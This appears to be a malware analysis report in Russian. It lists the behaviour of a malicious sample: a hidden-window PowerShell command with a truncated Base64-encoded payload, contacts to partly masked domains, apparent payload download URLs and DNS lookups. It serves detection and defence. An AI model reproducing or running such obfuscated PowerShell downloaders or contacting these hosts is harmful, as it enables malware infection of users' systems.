Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABBAHIAcwBpAHUAagBmAHcAaAA9ACcAVQBtAHQAeABvAGIAdgB1AGQAdQB1AGUAbQAnADsAJABVAHUAbgBhAHkAbwB0AGUAeAAgAD0AIAAnADEAOAA2ACcAOwAkAE8AdQBmAHgAaQBzAHYAeABpAHYAbQA9ACcASwBoAGUAawB5AHoAYgB...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1564
- %TEMP%\894696.cvr
- 'ma####sourcing.com':80
- 'gk##5.com':80
- http://ma####sourcing.com/wp-content/18/
- http://gk##5.com/6dn/ekeh/
- DNS ASK ma####sourcing.com
- DNS ASK se######nar.djamscakes.com
- DNS ASK gk##5.com
- DNS ASK be###rmer.com
- DNS ASK bl##.##ytimeneeds.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABBAHIAcwBpAHUAagBmAHcAaAA9ACcAVQBtAHQAeABvAGIAdgB1AGQAdQB1AGUAbQAnADsAJABVAHUAbgBhAHkAbwB0AGUAeAAgAD0AIAAnADEAOAA2ACcAOwAkAE8AdQBmAHgAaQBzAHYAeABpAHYAbQA9ACcASwBoAGUAawB5AHoAYgB...' (со скрытым окном)